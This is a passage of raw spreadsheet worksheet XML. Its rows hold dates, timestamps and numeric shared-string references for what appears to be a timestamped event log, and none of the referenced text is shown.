        <v>45833</v>
      </c>
      <c r="B31" s="12">
        <v>0.47240740740740739</v>
      </c>
      <c r="C31" t="s">
        <v>143</v>
      </c>
      <c r="D31" t="s">
        <v>18</v>
      </c>
      <c r="E31" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F31" t="s">
        <v>220</v>
      </c>
      <c r="G31" t="s">
        <v>16</v>
      </c>
      <c r="H31" t="s">
        <v>221</v>
      </c>
      <c r="I31" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="32" spans="1:9">
      <c r="A32" s="7">
        <v>45833</v>
      </c>
      <c r="B32" s="14">
        <v>0.47240740740740739</v>
      </c>
      <c r="C32" t="s">
        <v>143</v>
      </c>
      <c r="D32" t="s">
        <v>18</v>
      </c>
      <c r="E32" t="s">
        <v>17</v>
      </c>
      <c r="F32" t="s">
        <v>270</v>
      </c>
      <c r="G32" t="s">
        <v>16</v>
      </c>
      <c r="H32" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="33" spans="1:9">
      <c r="A33" s="7">
        <v>45833</v>
      </c>
      <c r="B33" s="12">
        <v>0.47241898148148148</v>
      </c>
      <c r="C33" t="s">
        <v>25</v>
      </c>
      <c r="D33" t="s">
        <v>29</v>
      </c>
      <c r="E33" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F33" t="s">
        <v>38</v>
      </c>
      <c r="G33" t="s">
        <v>31</v>
      </c>
      <c r="H33" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="34" spans="1:9">
      <c r="A34" s="7">
        <v>45833</v>
      </c>
      <c r="B34" s="12">
        <v>0.47241898148148148</v>
      </c>
      <c r="C34" t="s">
        <v>25</v>
      </c>
      <c r="D34" t="s">
        <v>18</v>
      </c>
      <c r="E34" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F34" t="s">
        <v>50</v>
      </c>
      <c r="G34" t="s">
        <v>44</v>
      </c>
      <c r="H34" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="35" spans="1:9">
      <c r="A35" s="7">
        <v>45833</v>
      </c>
      <c r="B35" s="12">
        <v>0.47241898148148148</v>
      </c>
      <c r="C35" t="s">
        <v>25</v>
      </c>
      <c r="D35" t="s">
        <v>29</v>
      </c>
      <c r="E35" t="s">
        <v>14</v>
      </c>
      <c r="F35" t="s">
        <v>81</v>
      </c>
      <c r="G35" t="s">
        <v>31</v>
      </c>
      <c r="H35" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="36" spans="1:9">
      <c r="A36" s="7">
        <v>45833</v>
      </c>
      <c r="B36" s="12">
        <v>0.47241898148148148</v>
      </c>
      <c r="C36" t="s">
        <v>143</v>
      </c>
      <c r="D36" t="s">
        <v>18</v>
      </c>
      <c r="E36" t="s">
        <v>17</v>
      </c>
      <c r="F36" t="s">
        <v>154</v>
      </c>
      <c r="G36" t="s">
        <v>16</v>
      </c>
      <c r="H36" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="37" spans="1:9">
      <c r="A37" s="7">
        <v>45833</v>
      </c>
      <c r="B37" s="12">
        <v>0.47241898148148148</v>
      </c>
      <c r="C37" t="s">
        <v>143</v>
      </c>
      <c r="D37" t="s">
        <v>18</v>
      </c>
      <c r="E37" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F37" t="s">
        <v>223</v>
      </c>
      <c r="G37" t="s">
        <v>16</v>
      </c>
      <c r="H37" t="s">
        <v>224</v>
      </c>
      <c r="I37" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="38" spans="1:9">
      <c r="A38" s="7">
        <v>45833</v>
      </c>
      <c r="B38" s="14">
        <v>0.47241898148148148</v>
      </c>
      <c r="C38" t="s">
        <v>143</v>
      </c>
      <c r="D38" t="s">
        <v>18</v>
      </c>
      <c r="E38" t="s">
        <v>17</v>
      </c>
      <c r="F38" t="s">
        <v>268</v>
      </c>
      <c r="G38" t="s">
        <v>16</v>
      </c>
      <c r="H38" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="39" spans="1:9">
      <c r="A39" s="7">
        <v>45833</v>
      </c>
      <c r="B39" s="12">
        <v>0.47241898148148148</v>
      </c>
      <c r="C39" t="s">
        <v>25</v>
      </c>
      <c r="D39" t="s">
        <v>29</v>
      </c>
      <c r="E39" s="8" t="s">
        <v>318</v>
      </c>
      <c r="F39" t="s">
        <v>322</v>
      </c>
      <c r="G39" t="s">
        <v>320</v>
      </c>
      <c r="H39" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="40" spans="1:9">
      <c r="A40" s="7">
        <v>45833</v>
      </c>
      <c r="B40" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C40" t="s">
        <v>142</v>
      </c>
      <c r="D40" t="s">
        <v>18</v>
      </c>
      <c r="E40" t="s">
        <v>17</v>
      </c>
      <c r="F40" t="s">
        <v>226</v>
      </c>
      <c r="G40" t="s">
        <v>16</v>
      </c>
      <c r="H40" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="41" spans="1:9">
      <c r="A41" s="7">
        <v>45833</v>
      </c>
      <c r="B41" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C41" t="s">
        <v>143</v>
      </c>
      <c r="D41" t="s">
        <v>18</v>
      </c>
      <c r="E41" t="s">
        <v>17</v>
      </c>
      <c r="F41" t="s">
        <v>226</v>
      </c>
      <c r="G41" t="s">
        <v>16</v>
      </c>
      <c r="H41" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="42" spans="1:9">
      <c r="A42" s="7">
        <v>45833</v>
      </c>
      <c r="B42" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C42" t="s">
        <v>142</v>
      </c>
      <c r="D42" t="s">
        <v>18</v>
      </c>
      <c r="E42" t="s">
        <v>17</v>
      </c>
      <c r="F42" t="s">
        <v>226</v>
      </c>
      <c r="G42" t="s">
        <v>16</v>
      </c>
      <c r="H42" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="43" spans="1:9">
      <c r="A43" s="7">
        <v>45833</v>
      </c>
      <c r="B43" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C43" t="s">
        <v>143</v>
      </c>
      <c r="D43" t="s">
        <v>18</v>
      </c>
      <c r="E43" t="s">
        <v>17</v>
      </c>
      <c r="F43" t="s">
        <v>226</v>
      </c>
      <c r="G43" t="s">
        <v>16</v>
      </c>
      <c r="H43" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="44" spans="1:9">
      <c r="A44" s="7">
        <v>45833</v>
      </c>
      <c r="B44" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C44" t="s">
        <v>142</v>
      </c>
      <c r="D44" t="s">
        <v>18</v>
      </c>
      <c r="E44" t="s">
        <v>17</v>
      </c>
      <c r="F44" t="s">
        <v>226</v>
      </c>
      <c r="G44" t="s">
        <v>16</v>
      </c>
      <c r="H44" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="45" spans="1:9">
      <c r="A45" s="7">
        <v>45833</v>
      </c>
      <c r="B45" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C45" t="s">
        <v>143</v>
      </c>
      <c r="D45" t="s">
        <v>18</v>
      </c>
      <c r="E45" t="s">
        <v>17</v>
      </c>
      <c r="F45" t="s">
        <v>226</v>
      </c>
      <c r="G45" t="s">
        <v>16</v>
      </c>
      <c r="H45" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="46" spans="1:9">
      <c r="A46" s="7">
        <v>45833</v>
      </c>
      <c r="B46" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C46" t="s">
        <v>142</v>
      </c>
      <c r="D46" t="s">
        <v>18</v>
      </c>
      <c r="E46" t="s">
        <v>17</v>
      </c>
      <c r="F46" t="s">
        <v>226</v>
      </c>
      <c r="G46" t="s">
        <v>16</v>
      </c>
      <c r="H46" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="47" spans="1:9">
      <c r="A47" s="7">
        <v>45833</v>
      </c>
      <c r="B47" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C47" t="s">
        <v>143</v>
      </c>
      <c r="D47" t="s">
        <v>18</v>
      </c>
      <c r="E47" t="s">
        <v>17</v>
      </c>
      <c r="F47" t="s">
        <v>226</v>
      </c>
      <c r="G47" t="s">
        <v>16</v>
      </c>
      <c r="H47" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="48" spans="1:9">
      <c r="A48" s="7">
        <v>45833</v>
      </c>
      <c r="B48" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C48" t="s">
        <v>142</v>
      </c>
      <c r="D48" t="s">
        <v>18</v>
      </c>
      <c r="E48" t="s">
        <v>17</v>
      </c>
      <c r="F48" t="s">
        <v>226</v>
      </c>
      <c r="G48" t="s">
        <v>16</v>
      </c>
      <c r="H48" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="49" spans="1:8">
      <c r="A49" s="7">
        <v>45833</v>
      </c>
      <c r="B49" s="14">
        <v>0.47244212962962961</v>
      </c>
      <c r="C49" t="s">
        <v>143</v>
      </c>
      <c r="D49" t="s">
        <v>18</v>
      </c>
      <c r="E49" t="s">
        <v>17</v>
      </c>
      <c r="F49" t="s">
        <v>226</v>
      </c>
      <c r="G49" t="s">
        <v>16</v>
      </c>
      <c r="H49" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="50" spans="1:8">
      <c r="A50" s="7">
        <v>45833</v>
      </c>
      <c r="B50" s="12">
        <v>0.4725347222222222</v>
      </c>
      <c r="C50" t="s">
        <v>25</v>
      </c>
      <c r="D50" t="s">
        <v>326</v>
      </c>
      <c r="E50" s="8" t="s">
        <v>318</v>
      </c>
      <c r="F50" t="s">
        <v>336</v>
      </c>
      <c r="G50" t="s">
        <v>337</v>
      </c>
      <c r="H50" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="51" spans="1:8">
      <c r="A51" s="7">
        <v>45833</v>
      </c>
      <c r="B51" s="14">
        <v>0.47327546296296297</v>
      </c>
      <c r="C51" t="s">
        <v>142</v>
      </c>
      <c r="D51" t="s">
        <v>18</v>
      </c>
      <c r="E51" t="s">
        <v>17</v>
      </c>
      <c r="F51" t="s">
        <v>226</v>
      </c>
      <c r="G51" t="s">
        <v>16</v>
      </c>
      <c r="H51" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="52" spans="1:8">
      <c r="A52" s="7">
        <v>45833</v>
      </c>
      <c r="B52" s="14">
        <v>0.47327546296296297</v>
      </c>
      <c r="C52" t="s">
        <v>142</v>
      </c>
      <c r="D52" t="s">
        <v>18</v>
      </c>
      <c r="E52" t="s">
        <v>17</v>
      </c>
      <c r="F52" t="s">
        <v>226</v>
      </c>
      <c r="G52" t="s">
        <v>16</v>
      </c>
      <c r="H52" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="53" spans="1:8">
      <c r="A53" s="7">
        <v>45833</v>
      </c>
      <c r="B53" s="14">
        <v>0.47327546296296297</v>
      </c>
      <c r="C53" t="s">
        <v>142</v>
      </c>
      <c r="D53" t="s">
        <v>18</v>
      </c>
      <c r="E53" t="s">
        <v>17</v>
      </c>
      <c r="F53" t="s">
        <v>226</v>
      </c>
      <c r="G53" t="s">
        <v>16</v>
      </c>
      <c r="H53" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="54" spans="1:8">
      <c r="A54" s="7">
        <v>45833</v>
      </c>
      <c r="B54" s="14">
        <v>0.47327546296296297</v>
      </c>
      <c r="C54" t="s">
        <v>142</v>
      </c>
      <c r="D54" t="s">
        <v>18</v>
      </c>
      <c r="E54" t="s">
        <v>17</v>
      </c>
      <c r="F54" t="s">
        <v>226</v>
      </c>
      <c r="G54" t="s">
        <v>16</v>
      </c>
      <c r="H54" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="55" spans="1:8">
      <c r="A55" s="7">
        <v>45833</v>
      </c>
      <c r="B55" s="14">
        <v>0.47327546296296297</v>
      </c>
      <c r="C55" t="s">
        <v>142</v>
      </c>
      <c r="D55" t="s">
        <v>18</v>
      </c>
      <c r="E55" t="s">
        <v>17</v>
      </c>
      <c r="F55" t="s">
        <v>226</v>
      </c>
      <c r="G55" t="s">
        <v>16</v>
      </c>
      <c r="H55" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="56" spans="1:8">
      <c r="A56" s="7">
        <v>45833</v>
      </c>
      <c r="B56" s="12">
        <v>0.47332175925925923</v>
      </c>
      <c r="C56" t="s">
        <v>25</v>
      </c>
      <c r="D56" t="s">
        <v>18</v>
      </c>
      <c r="E56" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F56" t="s">
        <v>51</v>
      </c>
      <c r="G56" t="s">
        <v>16</v>
      </c>
      <c r="H56" s="13" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="57" spans="1:8">
      <c r="A57" s="7">
        <v>45833</v>
      </c>
      <c r="B57" s="14">
        <v>0.47333333333333333</v>
      </c>
      <c r="C57" t="s">
        <v>143</v>
      </c>
      <c r="D57" t="s">
        <v>18</v>
      </c>
      <c r="E57" t="s">
        <v>17</v>
      </c>
      <c r="F57" t="s">
        <v>230</v>
      </c>
      <c r="G57" t="s">
        <v>16</v>
      </c>
      <c r="H57" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="58" spans="1:8">
      <c r="A58" s="7">
        <v>45833</v>
      </c>
      <c r="B58" s="14">
        <v>0.47333333333333333</v>
      </c>
      <c r="C58" t="s">
        <v>143</v>
      </c>
      <c r="D58" t="s">
        <v>18</v>
      </c>
      <c r="E58" t="s">
        <v>17</v>
      </c>
      <c r="F58" t="s">
        <v>230</v>
      </c>
      <c r="G58" t="s">
        <v>16</v>
      </c>
      <c r="H58" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="59" spans="1:8">
      <c r="A59" s="7">
        <v>45833</v>
      </c>
      <c r="B59" s="14">
        <v>0.47333333333333333</v>
      </c>
      <c r="C59" t="s">
        <v>143</v>
      </c>
      <c r="D59" t="s">
        <v>18</v>
      </c>
      <c r="E59" t="s">
        <v>17</v>
      </c>
      <c r="F59" t="s">
        <v>230</v>
      </c>
      <c r="G59" t="s">
        <v>16</v>
      </c>
      <c r="H59" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="60" spans="1:8">
      <c r="A60" s="7">
        <v>45833</v>
      </c>
      <c r="B60" s="14">
        <v>0.47333333333333333</v>
      </c>
      <c r="C60" t="s">
        <v>143</v>
      </c>
      <c r="D60" t="s">
        <v>18</v>
      </c>
      <c r="E60" t="s">
        <v>17</v>
      </c>
      <c r="F60" t="s">
        <v>230</v>
      </c>
      <c r="G60" t="s">
        <v>16</v>
      </c>
      <c r="H60" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="61" spans="1:8">
      <c r="A61" s="7">
        <v>45833</v>
      </c>
      <c r="B61" s="14">
        <v>0.47333333333333333</v>
      </c>
      <c r="C61" t="s">
        <v>143</v>
      </c>
      <c r="D61" t="s">
        <v>18</v>
      </c>
      <c r="E61" t="s">
        <v>17</v>
      </c>
      <c r="F61" t="s">
        <v>230</v>
      </c>
      <c r="G61" t="s">
        <v>16</v>
      </c>
      <c r="H61" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="62" spans="1:8">
      <c r="A62" s="7">
        <v>45833</v>
      </c>
      <c r="B62" s="12">
        <v>0.47370370370370368</v>
      </c>
      <c r="C62" t="s">
        <v>25</v>
      </c>
      <c r="D62" t="s">
        <v>18</v>
      </c>
      <c r="E62" s="8" t="s">
        <v>15</v>
      </c>
      <c r="F62" t="s">
        <v>53</v>
      </c>
      <c r="G62" t="s">
        <v>54</v>
      </c>
      <c r="H62" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="63" spans="1:8">
      <c r="A63" s="7">
        <v>45833</v>
      </c>
      <c r="B63" s="12">
        <v>0.47371527777777778</v>
      </c>
      <c r="C63" t="s">
        <v>143</v>
      </c>
      <c r="D63" t="s">
        <v>18</v>
      </c>
      <c r="E63" t="s">
        <v>17</v>
      </c>
      <c r="F63" t="s">
        <v>156</v>
      </c>
      <c r="G63" t="s">
        <v>16</v>
      </c>
      <c r="H63" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="64" spans="1:8">
      <c r="A64" s="7">
        <v>45833</v>
      </c>
      <c r="B64" s="14">
        <v>0.47371527777777778</v>
      </c>
      <c r="C64" t="s">
        <v>143</v>
      </c>
      <c r="D64" t="s">
        <v>18</v>
      </c>
      <c r="E64" t="s">
        <v>17</v>
      </c>
      <c r="F64" t="s">
        <v>234</v>
      </c>
      <c r="G64" t="s">
        <v>16</v>
      </c>
      <c r="H64" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="65" spans="1:8">
      <c r="A65" s="7">
        <v>45833</v>
      </c>
      <c r="B65" s="12">
        <v>0.47472222222222221</v>
      </c>
      <c r="C65" t="s">
        <v>25</v>
      </c>
      <c r="D65" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E65" t="s">
        <v>15</v>
      </c>
      <c r="F65" t="s">
        <v>117</v>
      </c>
      <c r="G65" t="s">
        <v>54</v>
      </c>
      <c r="H65" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="66" spans="1:8">
      <c r="A66" s="7">
        <v>45833</v>
      </c>
      <c r="B66" s="12">
        <v>0.47472222222222221</v>
      </c>
      <c r="C66" t="s">
        <v>25</v>
      </c>
      <c r="D66" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E66" t="s">
        <v>15</v>
      </c>
      <c r="F66" t="s">
        <v>119</v>
      </c>
      <c r="G66" t="s">
        <v>54</v>
      </c>
      <c r="H66" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="67" spans="1:8">
      <c r="A67" s="7">
        <v>45833</v>
      </c>
      <c r="B67" s="14">
        <v>0.47547453703703701</v>
      </c>
      <c r="C67" t="s">
        <v>142</v>
      </c>
      <c r="D67" t="s">
        <v>18</v>
      </c>
      <c r="E67" t="s">
        <v>17</v>
      </c>
      <c r="F67" t="s">
        <v>226</v>
      </c>
      <c r="G67" t="s">
        <v>16</v>
      </c>
      <c r="H67" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="68" spans="1:8">
      <c r="A68" s="7">
        <v>45833</v>
      </c>
      <c r="B68" s="14">
        <v>0.47547453703703701</v>
      </c>
      <c r="C68" t="s">
        <v>142</v>
      </c>
      <c r="D68" t="s">
        <v>18</v>
      </c>
      <c r="E68" t="s">
        <v>17</v>
      </c>
      <c r="F68" t="s">
        <v>226</v>
      </c>
      <c r="G68" t="s">
        <v>16</v>
      </c>
      <c r="H68" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="69" spans="1:8">
      <c r="A69" s="7">
        <v>45833</v>
      </c>
      <c r="B69" s="14">
        <v>0.47547453703703701</v>
      </c>
      <c r="C69" t="s">
        <v>142</v>
      </c>
      <c r="D69" t="s">
        <v>18</v>
      </c>
      <c r="E69" t="s">
        <v>17</v>
      </c>
      <c r="F69" t="s">
        <v>226</v>
      </c>
      <c r="G69" t="s">
        <v>16</v>
      </c>
      <c r="H69" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="70" spans="1:8">
      <c r="A70" s="7">
        <v>45833</v>
      </c>
      <c r="B70" s="14">
        <v>0.47547453703703701</v>
      </c>
      <c r="C70" t="s">
        <v>142</v>
      </c>
      <c r="D70" t="s">
        <v>18</v>
      </c>
      <c r="E70" t="s">
        <v>17</v>
      </c>
      <c r="F70" t="s">
        <v>226</v>
      </c>
      <c r="G70" t="s">
        <v>16</v>
      </c>
      <c r="H70" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="71" spans="1:8">
      <c r="A71" s="7">
        <v>45833</v>
      </c>
      <c r="B71" s="14">
        <v>0.47547453703703701</v>
      </c>
      <c r="C71" t="s">
        <v>142</v>
      </c>
      <c r="D71" t="s">
        <v>18</v>
      </c>
      <c r="E71" t="s">
        <v>17</v>
      </c>
      <c r="F71" t="s">
        <v>226</v>
      </c>
      <c r="G71" t="s">
        <v>16</v>
      </c>
      <c r="H71" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="72" spans="1:8">
      <c r="A72" s="7">
        <v>45833</v>
      </c>
      <c r="B72" s="12">
        <v>0.47664351851851849</v>
      </c>
      <c r="C72" t="s">
        <v>143</v>
      </c>
      <c r="D72" t="s">
        <v>18</v>
      </c>
      <c r="E72" t="s">
        <v>17</v>
      </c>
      <c r="F72" t="s">
        <v>158</v>
      </c>
      <c r="G72" t="s">
        <v>16</v>
      </c>
      <c r="H72" t="s">
        <v>144</v>
      </c>
    </row>
    <row r="73" spans="1:8">
      <c r="A73" s="7">
        <v>45833</v>
      </c>
      <c r="B73" s="14">
        <v>0.47664351851851849</v>
      </c>
      <c r="C73" t="s">
        <v>143</v>
      </c>
      <c r="D73" t="s">
        <v>18</v>
      </c>
      <c r="E73" t="s">
        <v>17</v>
      </c>
      <c r="F73" t="s">
        <v>236</v>
      </c>
      <c r="G73" t="s">
        <v>16</v>
      </c>
      <c r="H73" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="74" spans="1:8">
      <c r="A74" s="7">
        <v>45833</v>
      </c>
      <c r="B74" s="12">
        <v>0.4770138888888889</v>
      </c>
      <c r="C74" t="s">
        <v>143</v>
      </c>
      <c r="D74" t="s">
        <v>18</v>
      </c>
      <c r="E74" t="s">
        <v>17</v>
      </c>
      <c r="F74" t="s">
        <v>159</v>
      </c>
      <c r="G74" t="s">
        <v>16</v>
      </c>
      <c r="H74" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="75" spans="1:8">
      <c r="A75" s="7">
        <v>45833</v>
      </c>
      <c r="B75" s="14">
        <v>0.4770138888888889</v>
      </c>
      <c r="C75" t="s">
        <v>143</v>
      </c>
      <c r="D75" t="s">
        <v>18</v>
      </c>
      <c r="E75" t="s">
        <v>17</v>
      </c>
      <c r="F75" t="s">
        <v>238</v>
      </c>
      <c r="G75" t="s">
        <v>16</v>
      </c>
      <c r="H75" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="76" spans="1:8">
      <c r="A76" s="7">
        <v>45833</v>
      </c>
      <c r="B76" s="12">
        <v>0.47743055555555558</v>
      </c>
      <c r="C76" t="s">
        <v>25</v>
      </c>
      <c r="D76" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E76" t="s">
        <v>15</v>
      </c>
      <c r="F76" t="s">
        <v>113</v>
      </c>
      <c r="G76" t="s">
        <v>54</v>
      </c>
      <c r="H76" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="77" spans="1:8">
      <c r="A77" s="7">
        <v>45833</v>
      </c>
      <c r="B77" s="12">
        <v>0.47743055555555558</v>
      </c>
      <c r="C77" t="s">
        <v>25</v>
      </c>
      <c r="D77" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E77" t="s">
        <v>15</v>
      </c>
      <c r="F77" t="s">
        <v>115</v>
      </c>
      <c r="G77" t="s">
        <v>54</v>
      </c>
      <c r="H77" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="78" spans="1:8">
      <c r="A78" s="7">
        <v>45833</v>
      </c>
      <c r="B78" s="12">
        <v>0.4778587962962963</v>
      </c>
      <c r="C78" t="s">
        <v>25</v>
      </c>
      <c r="D78" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E78" t="s">
        <v>15</v>
      </c>
      <c r="F78" t="s">
        <v>105</v>
      </c>
      <c r="G78" t="s">
        <v>54</v>
      </c>
      <c r="H78" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="79" spans="1:8">
      <c r="A79" s="7">
        <v>45833</v>
      </c>
      <c r="B79" s="12">
        <v>0.4778587962962963</v>
      </c>
      <c r="C79" t="s">
        <v>25</v>
      </c>
      <c r="D79" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E79" t="s">
        <v>15</v>
      </c>
      <c r="F79" t="s">
        <v>107</v>
      </c>
      <c r="G79" t="s">
        <v>54</v>
      </c>
      <c r="H79" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="80" spans="1:8">
      <c r="A80" s="7">
        <v>45833</v>
      </c>
      <c r="B80" s="12">
        <v>0.4778587962962963</v>
      </c>
      <c r="C80" t="s">
        <v>25</v>
      </c>
      <c r="D80" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E80" t="s">
        <v>15</v>
      </c>
      <c r="F80" t="s">
        <v>109</v>
      </c>
      <c r="G80" t="s">
        <v>54</v>
      </c>
      <c r="H80" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="81" spans="1:8">
      <c r="A81" s="7">
        <v>45833</v>
      </c>
      <c r="B81" s="12">
        <v>0.4778587962962963</v>
      </c>
      <c r="C81" t="s">
        <v>25</v>
      </c>
      <c r="D81" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E81" t="s">
        <v>15</v>
      </c>
      <c r="F81" t="s">
        <v>111</v>
      </c>
      <c r="G81" t="s">
        <v>54</v>
      </c>
      <c r="H81" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="82" spans="1:8">
      <c r="A82" s="7">
        <v>45833</v>
      </c>
      <c r="B82" s="12">
        <v>0.47871527777777778</v>
      </c>
      <c r="C82" t="s">
        <v>143</v>
      </c>
      <c r="D82" t="s">
        <v>18</v>
      </c>
      <c r="E82" t="s">
        <v>17</v>
      </c>
      <c r="F82" t="s">
        <v>161</v>
      </c>
      <c r="G82" t="s">
        <v>16</v>
      </c>
      <c r="H82" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="83" spans="1:8">
      <c r="A83" s="7">
        <v>45833</v>
      </c>
      <c r="B83" s="14">
        <v>0.47871527777777778</v>
      </c>
      <c r="C83" t="s">
        <v>143</v>
      </c>
      <c r="D83" t="s">
        <v>18</v>
      </c>
      <c r="E83" t="s">
        <v>17</v>
      </c>
      <c r="F83" t="s">
        <v>240</v>
      </c>
      <c r="G83" t="s">
        <v>16</v>
      </c>
      <c r="H83" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="84" spans="1:8">
      <c r="A84" s="7">
        <v>45833</v>
      </c>
      <c r="B84" s="12">
        <v>0.47918981481481482</v>
      </c>
      <c r="C84" t="s">
        <v>25</v>
      </c>
      <c r="D84" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E84" t="s">
        <v>15</v>
      </c>
      <c r="F84" t="s">
        <v>102</v>
      </c>
      <c r="G84" t="s">
        <v>54</v>
      </c>
      <c r="H84" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="85" spans="1:8">
      <c r="A85" s="7">
        <v>45833</v>
      </c>
      <c r="B85" s="12">
        <v>0.47918981481481482</v>
      </c>
      <c r="C85" t="s">
        <v>25</v>
      </c>
      <c r="D85" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E85" t="s">
        <v>15</v>
      </c>
      <c r="F85" t="s">
        <v>100</v>
      </c>
      <c r="G85" t="s">
        <v>54</v>
      </c>
      <c r="H85" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="86" spans="1:8">
      <c r="A86" s="7">
        <v>45833</v>
      </c>
      <c r="B86" s="12">
        <v>0.47967592592592595</v>
      </c>
      <c r="C86" t="s">
        <v>25</v>
      </c>
      <c r="D86" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E86" s="8" t="s">
        <v>15</v>
      </c>
      <c r="F86" s="13" t="s">
        <v>56</v>
      </c>
      <c r="G86" t="s">
        <v>54</v>
      </c>
      <c r="H86" s="13" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="87" spans="1:8">
      <c r="A87" s="7">
        <v>45833</v>
      </c>
      <c r="B87" s="12">
        <v>0.47967592592592595</v>
      </c>
      <c r="C87" t="s">
        <v>25</v>
      </c>
      <c r="D87" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E87" t="s">
        <v>15</v>
      </c>
      <c r="F87" t="s">
        <v>98</v>
      </c>
      <c r="G87" t="s">
        <v>54</v>
      </c>
      <c r="H87" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="88" spans="1:8">
      <c r="A88" s="7">
        <v>45833</v>
      </c>
      <c r="B88" s="12">
        <v>0.47967592592592595</v>
      </c>
      <c r="C88" t="s">
        <v>25</v>
      </c>
      <c r="D88" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E88" t="s">
        <v>15</v>
      </c>
      <c r="F88" t="s">
        <v>100</v>
      </c>
      <c r="G88" t="s">
        <v>54</v>
      </c>
      <c r="H88" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="89" spans="1:8">
      <c r="A89" s="7">
        <v>45833</v>
      </c>
      <c r="B89" s="12">
        <v>0.48054398148148147</v>
      </c>
      <c r="C89" t="s">
        <v>142</v>
      </c>
      <c r="D89" t="s">
        <v>29</v>
      </c>
      <c r="E89" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F89" t="s">
        <v>274</v>
      </c>
      <c r="G89" t="s">
        <v>31</v>
      </c>
      <c r="H89" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="90" spans="1:8">
      <c r="A90" s="7">
        <v>45833</v>
      </c>
      <c r="B90" s="12">
        <v>0.48062500000000002</v>
      </c>
      <c r="C90" t="s">
        <v>25</v>
      </c>
      <c r="D90" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E90" t="s">
        <v>15</v>
      </c>
      <c r="F90" t="s">
        <v>94</v>
      </c>
      <c r="G90" t="s">
        <v>54</v>
      </c>
      <c r="H90" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="91" spans="1:8">
      <c r="A91" s="7">
        <v>45833</v>
      </c>
      <c r="B91" s="12">
        <v>0.48062500000000002</v>
      </c>
      <c r="C91" t="s">
        <v>25</v>
      </c>
      <c r="D91" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E91" t="s">
        <v>15</v>
      </c>
      <c r="F91" t="s">
        <v>96</v>
      </c>
      <c r="G91" t="s">
        <v>54</v>
      </c>
